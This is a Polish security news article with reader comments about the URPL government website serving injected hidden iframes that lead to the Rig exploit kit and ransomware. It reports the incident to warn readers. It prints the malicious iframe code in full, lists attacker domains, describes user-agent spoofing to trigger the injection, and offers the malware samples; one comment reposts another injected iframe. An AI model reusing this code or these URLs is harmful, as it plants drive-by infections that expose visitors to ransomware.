Niestety przypadek strony KNFu infekującego gości nie jest odosobniony. Od kilku dni odwiedzających infekuje strona Urzędu Rejestracji Produktów Leczniczych a obserwowany złośliwy kod szyfruje dyski pechowych użytkowników.
Ostrzeżcie znajomych lekarzy, farmaceutów i osoby z sektora medycznego. 17go lutego od jednego z Czytelników otrzymaliśmy informację o tym, ze witryna www.urpl.gov.pl próbuje infekować odwiedzających ją użytkowników. Gdy spojrzeliśmy na kod, okazało się, że najwyraźniej własnie przestała zarażać, zatem nie poruszaliśmy już tego tematu. Wczoraj okazało się jednak, że infekcje nadal trwają. Problem zgłszaliśmy już w paru miejscach, lecz do tej pory bez skutku. Może ten artykuł pomoże obudzić osoby odpowiedzialne.
Wstrzyknę Ci ramkę
Na serwerze URPL najwyraźniej znajduje się nieautoryzowany złośliwy kod, który decyduje o tym, komu i co wstrzykąć do okienka przeglądarki. Aby otrzymać dodatkową treść trzeba się przedstawić jako Internet Explorer. Wstrzykiwana treść cały czas się zmienia, ale wg dostępnych informacji prowadzi do exploit kita Rig, czyli narzędzia atakującego przeglądarki. Samemu atakowi zaraz się przyjrzymy, najpierw pokażemy objawy. Aby zobaczyć efekt samemu najlepiej nie tylko sfłaszować pole User Agent w przeglądarce, ale trzeba także usunąć ciasteczko _PHP_SESSION_PHP, którego obecność sprawia, że złośliwy kod nie jest już wstrzykiwany (w Chrome przyda się np. wtyczka EditThisCookie oraz UA Spoofer).
IE8 otrzymuje np. taki kod (z ciągiem „Microsoft_Edge):
<span style="position:absolute; top:-1065px; width:320px; height:310px;"> lrsf <iframe src="http://art.kidsonthestreet.com/?yus=Microsoft_Edge.109qn59.406h1n7y7&biw=Microsoft_Edge.93sz103.406h7j8a8&q=wHvQMvXcJwDMFYbGMvrESKNbNknQA0CPxpH2_drVdZqxKGni1Ob5UUSk6FWCEh3&br_fl=1195&oq=h9_svebdVOAvoiReFe1Q3zosJUFwa8_2v2kHcwB-dhpLQ-hTYNw91z6LRVvQ92w&tuif=3242&ct=Microsoft_Edge" width="270" height="259"></iframe> svobe </span> ixui
IE 9 w miejscu „Microsoft_Edge” zobaczy „Vivaldi” a IE 10 „SeaMonkey” – nie pytajcie nas dlaczego, nie wiemy co przyświecało autorowi.
Domeny które do tej pory zauważyliśmy to:
art.kidsonthestreet.com cust.neighborhoodreunion.org best.neighborhoodreunion.com 1ice.sellfloridahomes.com zap.hospitality-health.org card.floridawholesaleproduce.com
Kod serwowany z tej ramki przekierowywał do kolejnej strony na tym samym serwerze, która z kolei serwowała zaciemniony plik JS, który serwował plik SWF, który powinien był zaserwować końcowy złośliwy ładunek, lecz nasze eksperymenty z jego pobraniem nie powiodły się. Pliki pobrane w trakcie przygotowywania artykułu znajdziecie tutaj (hasło: infected). Na szczęście domeny, które widzieliśmy, nie sa obce innym badaczom, którzy mieli więcej szczęścia i umiejętności i doszli do tego, co ten exploit kit serwował – a było to najczęściej ransomware Cerber lub niezidentyfikowany plik DLL.
Skąd ta infekcja i co z nią można zrobić
Oczywiście mozemy tylko spekulować – ale pierwszym pomysłem jest dostępna na serwerze URPL informacja, że korzysta on z Drupala w wersji 7.41 z października 2015, w którym nie brakuje znanych podatności. Wczoraj ok. godziny 14 wysłalismy pełną informację o naszych ustaleniach na adresy Gabinetu Dyrektora Generalnego odpowiedzialnego za Biuro Informatyki oraz do rzecznika urzędu. Wobec braku reakcji ok. godziny 21 zgłosiliśmy także incydent w CERT.GOV.PL. Niestety widzimy, że mimo, iz zbliża się 11, witryna jest nadal dostępna i nadal infekuje użytkowników. Może znacie kogoś, kto mógłby ją wyłączyć?
Przy okazji smutna refleksja – ciekawe, ile niezaktualizowanych komputerów z Windows XP i Internet Explorerem 8 znajdujących się w placówkach służby zdrowia, które witrynę URPL odwiedzają, padło ofiarą ransomware dzięki tak dalece posuniętej niefrasobliwości URPL. Obawiamy się jednak, że tak jak przykład KNF, tak przykład URPL niewiele zmieni.
Aktualizacja 12:00
Chwilę temu otrzymaliśmy odpowiedź od URPL:
Niestety witryna nie została wyłączona i nadal zawiera złośliwe oprogramowanie.
Aktualizacja 16:00
URPL nadal serwuje złośliwe oprogramowanie mimo świadomości istnienia takiego zagrożenia. Co więcej, publikuje na swoim Facebooku linki zachęcające do odwiedzania witryny. Czy to się nadaje już do prokuratury?
Dziękujemy Dariuszowi za zgłoszenie problemu i anonimowym analitykom, którzy spędzili czas nad jego analizą.
Komentarze
Cholerni debile rządowi analfabeci…
od siebie dodam, że ja mam card.stevyerose.com
Dane z VirusTotal: https://www.virustotal.com/en/url/a9a0542946b1036c8c218a28079784305871f9987dd6faed63c02dd612cfc987/analysis/1487678057/
Standardowe policyjne podejście, „nie ma przestępstwa, bo jeszcze pana nie zabił”.
Czy przypadkiem ta strona nie zawiera rejestru dopuszczonych do użytku w Polsce leków jak i ich zamienników?
Praktycznie każdy świadomy użytkownik aptek internetowych jak i poszukujący tańszego leku jest potencjalnie celem tej kampanii.
Przypomina mi się akcja sprzed kilku tygodni u naszych sąsiadów:
http://www.pandasecurity.com/mediacenter/pandalabs/dangerous-malware-neutralized/
ten sam sektor, inny wektor, może u nas lepiej wychodzą zatrute wodopoje?
Świadomy, właśnie, czyli nikły procent klientów aptek ;)
Robi się tragicznie i dramatycznie
1. Wodopój w domenie rządowej to dramat.
2. Przyczyna (Drupal) to kolejny dramat.
3. Brak kontaktu adminem – bardzo źle.
4. Ignorancja CERT.GOV – gorzej.
5. Brak procedur … brak best practice.
Dla mnie najgorsze w tym wszystkim jest całkowity bark przygotowania. Różnego rodzaju incydenty będą się zdarzały … tego się nie wyeliminuje. Można incydenty znacznie ograniczyć (choćby aktualizując oprogramowanie). Ale na incydenty trzeba się przygotować.
Fajnie jak ma się dobre praktyki, i zespół umiejący logicznie postępować. Ale najlepiej mieć procedury …
Dobrze przygotowana strategia przeciwdziałania incydentom i zwalczaniu tych, które już wystąpiły powinna być oparta na 6 krokach:
1. Przygotowanie (preparation);
2. Identyfikacja (identification);
3. Ograniczanie (containment);
4. Środki naprawcze (remediation);
5. Odzyskiwanie – powrót do stanu sprzed ataku (recovery);
6. Wnioski (aftermath).
I jeden z ważnych punktów Ograniczanie (containment) … jak czytam ” prowadzony jest obecnie we współpracy z zewnętrznym wykonawcą audyt bezpieczeństwa tej witryny. ” to mnie skręca. A gdzie potwierdzenie incydentu i ograniczenie jest zasięgu…. nie potrzebny jest audyt by stwierdzić, że storna jest „zatruta” … wystraczy CTRL+U.
Irek
Co Ty mówisz, jakie dobre praktyki… Zatrudnij się w państwówce, to zobaczysz, jak jest naprawdę. Nawet jak fachowcy się trafią dobrzy (co za tak niskie płace jest trudne), to przełożeni często są nie-informatykami i nie znają się na tym w ogóle. Dawno temu pracowałem w państwowej firmie. Mieliśmy incydent z wirusem (antywirus nie wyłapał). Podjęliśmy kroki zgodne z wiedzą i zdrowym rozsądkiem, żeby ograniczyć straty itp., zresztą ściągnięty potem (dla własnej obrony) specjalista zewnętrzny powiedział, że postępowaliśmy prawidłowo. Za to jakiś ciemniak „na górze” stwierdził, że wszystko źle. Jednym z zarzutów była nieobecność Administratora w dzień ataku – a skąd miał wiedzieć, że w ten dzień ktoś zawlecze wirusa? I od kiedy wolno kogoś ściągać z L4? No i okazało się, że nie mieliśmy zacząć od ograniczania infekcji i szkód, tylko… skontaktować się z jednostką nadrzędną w celu omówienia tematu. A co tu omawiać, jak wszystko pada, serwer po serwerze? Trzeba działać i ratować, co się da!
Potwierdzam.
Najlepsze praktyki w urzędach są takie, że przy wdrożeniu maszyn na VM Ware admin bez najmniejszego oporu spisał i dał nam hasła wszystkich usług i kont root, po czym wyszedł na 4 h. Po wdrożeniu zapytał czy wszystko działa, i gdzie dzwonić gdyby jednak nie zagrało.
Zupełnym bandytyzmem jest to, że mają środki na budowanie pomników (cirka 80 000zł), a średniej wielkości NAS z 8-10 dyskami + OS, to za duży wydatek.
Powiem więcej. W ramach szukania oszczędności, część z jednostek samorządu terytorialnego zmuszona została do ograniczenia wydatkowania środków na oprogramowanie lub np. sprzęt. Skutkiem czego nie ma ani dobrego oprogramowania (AV, firewall, DLP) zarządzanego zbiorczo, ani redundantnego sprzętu. Dla jednostek, gdzie pracuje 70 stacji roboczych problemem jest mieć jeden (1!) zasilacz na stanie. Zakup oczywiście odrzucony przez pion administracyjni-techniczny (któremu podlega IT sic!) ponieważ aktualnie nie na awarii.
Mógłbym Wam kilka ciekawych historii opisać jeszcze sprzed 7-10 lat.
To ja podam jeden przykład jak to w budżetówce bywa.
Swego czasu „chodziłem po klientach z pudełkami”. Ministerstwo, PoC sprzętu przeciwdziałającego APT itp (ale dla odmiany nie „ogniste oko”), wykryta i ładnie (jak na PoC) opisana potwierdzona infekcja nieznanym malwarem jednej ze stacji roboczych. Pięęęęękny atak celowany – email spreparowany perfekcyjnie pod konkretnego pracownika konkretnej instytucji (piękna polszczyzna, treść „na temat” i tylko gdzieś głęboko w załączonym pptx były ze dwa słowa w cyrylicy). Osoba decyzyjna po stronie ministerstwa otworzyła szeroko oczy, wyraziła podziw, wzięła raport, podziękowała za testy i powiedziała, że „będzie w kontakcie”. Dwa tygodnie później wszelkie CERTy w Polsce zaczęły bardzo głośno ostrzegać o nowej kampanii a jej opis to wypisz-wymaluj to, co w ministerstwie widzieliśmy. Ze strony ministerstwa dowiedzieliśmy się tylko nieoficjalnie od jednego z informatyków, że ten konkretny komputer został zaorany (no brawo! czyli już po problemie :) i że niestety szef raczej się nie odezwie bo w poprzednim roku po długich walkach wymęczył budżet na zakup NGFW i gdyby poszedł do przełożonych po kolejną kasę na „niezbędne inwestycje”, to wyleciałby z roboty za zmarnowanie całego poprzedniego budżetu (przecież ten nasz raport był jasnym dowodem, że wdrożone takim nakładem sił i środków NGFW nie spełniają swojej roli).
A co do pracy w budżetówce… A dziękuję, posmakowałem. Prawie rok wytrzymałem, ale nie mam zamiaru powtarzać tego eksperymentu.
Czy dobrze rozumiem, że wczoraj wysłaliście pełną informację a dzisiaj odpowiadają, że nie mają żadnych potwierdzonych i proszą o przekazanie szczegółów?
To brzmi (o dziwo!) jak totalny brak kompetencji po stronie państwówki ;-)
Jednego nie rozumiem: skoro wszyscy tu piszący komentarze są tacy dobrzy, kompetentni, wyedukowani, to czemu nie zatrudnią się w państwówkach i nie zrobią wszystkiego dobrze? A może łatwo gadać, ciężko zrobić? Państwowe firmy czekają na dobrych fachowców! Jedna instytucja państwowa z Krakowa przed ROK wystawiała ogłoszenia o naborze na DWA stanowiska informatyka – NIE BYŁO CHĘTNYCH. Dopiero po roku udało się kogoś zatrudnić, ale chyba tylko na 1 stanowisko. Czemu się tam nikt z „produkujących” się na Niebezpieczniku „fachowców” nie zgłosił? Moglibyście się wykazać wielką wiedzą i kompetencjami.
Kpisz czy o drogę pytasz?
Pracować w budżetówce za głodową pensję mając za przełożonego debila z nadania partyjnego?
Dziękuję postoję tu gdzie siedzę.
Może dlatego, że porządny fachowiec nie przyjdzie do budżetówki za pensję 2,5 tys. zł brutto?
Artur idź do sektora prywatnego, pozbędziesz się tej zgorzkniałości ;)
Zbyt wiele oczekujesz od domorosłych teoretycznych chakierowników ;) Marzyciele, rezonerzy oddają się swej pasji w komentarzach.
Co za dramat. Dostają informację, że ich strona infekuje kompy, to będą czekali z wynikiem audytu na podjęcie jakichkolwiek działań? Ja rozumiem – najpierw trzeba potwierdzić, że faktycznie jest źle, ale to przecież nie wymaga niczego więcej niż wejścia na ich własną stronę.
Audytorzy mają zajęte rączki, bo trzeba mieszać kubeczkiem, aby na kakałku nie zrobił się kożuch.
Wiadomo jak jest w państwówce – 0 konsekwencji. To komuna po tuningu, bo stara zbankrutowała. Ta też już ledwo zipie.
Mylisz się. Jeżeli malware spowoduje zniszczenie, uszkodzenie, usuniecie lub zmianę zapisu istotnej informacji, to jest to tzw. przestępstwo przeciwko informacji. W Polsce grozi za nie kara więzienia nawet do trzech lat.
Ale przecież najpierw trzeba złapać autora malware, aby postawić mu zarzuty :) PRAWDA?
Jeśli masz wiedzę i nie reagujesz, sam zostaniesz pociągnięty do odpowiedzialności.
Wow. Próbowałem właśnie zgłosić formalnie incydent opisany tutaj do NCCyber ale brak formularza incydentu! Nigdzie, zero!
Ktoś zna stronę? Kiedyś była, teraz brak!
Cały misterny plan budowania świadomości użytkowników internetu poszedł z dymem. To gdzie oni mają zgłaszać incydenty dotyczące bezpieczeństwa w publicznym internecie? Na Policję? A jak nie na Policję to gdzie?
Zgłosiłem na dyzurnet.pl z braku laku jako nielegalną treść, w końcu obcy skrypt na stronie rządowej jest jak najbardziej nielegalną treścią. Zobaczymy co dalej.
Zachęcam do zgłaszania tego problemu – może doczekamy się reakcji.
Interesuje mnie, czy ktoś poinformował placówki medyczne, w tym te prywatne o tym zagrożeniu?
W przypadku KNF był SWOZ, a tutaj?
https://www.cert.pl/zglos-incydent/
Domena jest rządowa gov.pl. Incydent jest kompetencjach certu rządowego cert.gov.pl (to jest ich obszar działalności/odbiorców/użytkowników – constituency)
A po co formularz i dlaczego chcesz chłopakom przeszkadzać?
Ten oryginalny URL też jest już rozponawany jako malware, pewnie dlatego zmienili https://virustotal.com/en/url/21037ba58cdee81b9774e5c0f707ed544bf93ac94fb33ef3f96121a588b7916d/analysis/
Kolejna domena: bbc.trashoutservices.com.
btw. nie wiem na ile skuteczny jest ich szkodnik, ale na windows phone też wkleja link.
Stawiam flaszkę, że zewnętrzy audytor to pociotek jakiegoś urzędnika i dopiero rozpisują umowę na odpowiednią kwotę ;-)
Słyszałem plotki, że ludzie z działu IT pozwalniali się i musieli zatrudnić nowych. Na bipie były ogłoszenia o naborze, co może być potwierdzeniem tych plotek.
Zdaje sie, ze strona urzedu wlasnie przestala dzialac…
Firefox + User Agent Switcher -> IE8
cwe
[iframe src=”http://free.bebeccino.uk/?yus=Microsoft_Edge.123tk60.406m3a8t4&q=z33QMvXcJwDQDoTEMvrESLtEMU_OGUKK2OH_783VCZf9JHT1vvHPRAPztgW&tuif=1132&biw=Microsoft_Edge.104hx74.406c9j6r7&ct=Microsoft_Edge&oq=CelXWo_opLOQBOgviik2JewA0nIdbUA8U96-piRTSyEOeiJOD-CW9UU4HupE&br_fl=5706″ width=”260″ height=”260″></iframe]
yazb
(znaczniki iframe zniekształcone prze mnie, bo poprzedni komentarz nie wyświetlił się, podejrzewam że zadziałało jakieś zabezpieczenie
A w nagłówku loga instytucji piękne „Beta”…
Ciekawe czy jest jakaś strona, której celem byłby naming and shaming witryn, które nie aktualizują swoich CMSów. Najgorsze jest właśnie to, że te strony stwarzają większe ryzyko dla użytkowników bez rozwiązań takich jak uMatrix niż dla administratorów i właścicieli domen.
Może dałoby się to rozwiązać tak, jak google – dawać 30 dni na rekacje a potem publikować.
Zapewne czekają na feedback autorów — grupy stażystów obecnie zmagajacymi się z sesją xD
Szkoda, ze artykul jest taki nieprecyzyjny. Brakuje informacji o:
1. Kto jest podatny? Czy zaktualizowany Windows sie obroni?
2. Wersje podatnego Windowsa.
3 Czy najnowszy Flash sie obroni?
4. Co jesli nie mam zainstalowanego Flasha?
5. Co jesli nie pracuje na koncie admina?
Nie sposób tego jednoznacznie ustalić. Atakujący może w każdej chwili podmienić jednego exploita na drugiego, jeden payload na drugi, może użyć dla każdego odwiedzającego komputera innego payloadu/exploita… Nigdy nie wiesz co dostaniesz, dlatego artykuł mówi o tym, by strony nie odwiedzać, a jej właścicielom by ją naprawili.
Doskonałym podsumowaniem niech będzie: „Dziękujemy za zgłoszenie. Grupy stażystów już pracują nad jego rozwiązaniem.”
Problem występuje przynajmniej od końca zeszłego roku. Osobiście zgłaszałem to parokrotnie (raz nawet udało mi się dodzwonić) , niestety poza przyjęciem informacji oraz potwierdzeniem odczytania maila przez konkretne osoby – zero efektu.
Mnie zastanawia, skoro to takie masowe, dlaczego nie ma informacji o masowych infekcjach, szyfrowaniu masowym dysków? Czy to cholerstwo jest skuteczne czy nie?
Zdaje się, że strona została wyłączona… Przynajmniej tak podało radio Zet, a przeglądarki zwracają komunikat o zbyt długim oczekiwaniu na połączenie…
Strona wróciła. Wiadomo może czy już jest napewno czysta ?
No właśnie brak jakichkolwiek doniesień na necie. Usługa Cisco Scan-safe nadal blokuję stronę jako zawierającą malware. Dzwoniliśmy dzisiaj do urzędu, zezwolili nam zarejestrować nowy środek medyczny za pomocą formularza offline. Wnioskuję więc, że problem nadal występuje.